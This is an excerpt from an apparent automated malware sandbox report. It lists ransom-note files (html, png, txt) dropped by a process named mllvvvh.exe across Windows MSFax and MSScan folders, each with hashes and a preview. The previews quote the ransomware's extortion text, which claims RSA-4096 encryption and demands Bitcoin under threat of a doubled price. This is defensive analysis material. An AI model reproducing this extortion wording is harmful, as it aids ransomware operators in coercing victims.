                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSFax\SentItems\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\SentItems\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows NT\MSFax\SentItems\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSFax\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows NT\MSFax\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSScan\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSScan\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows NT\MSScan\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
